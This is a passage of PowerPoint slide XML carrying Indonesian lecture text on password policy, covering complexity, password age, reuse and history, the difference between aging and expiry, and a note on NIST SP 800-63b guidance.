              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>yaitu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kombinasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setidaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>delapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alfanumerik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alfanumerik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>huruf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Umur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Kata Sandi-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memaksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Kata Sandi dan Riwayat-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pernah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>riwayat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>usia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> minimum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengulang-ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kembali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>frasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disukai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Umur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kedaluwarsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>membedakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>keduanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>demikian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>penuaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>periode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>segera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Kedaluwarsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kedaluwarsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dinonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memperhatikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>panduan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terbaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dikeluarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> oleh NIST (nvlpubs.nist.gov/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>nistpubs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>SpecialPublications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>/NIST.SP.800-63b.pdf) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>elemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tradisional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kerumitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>usia</a:t>
            </a:r>
            <a:r>
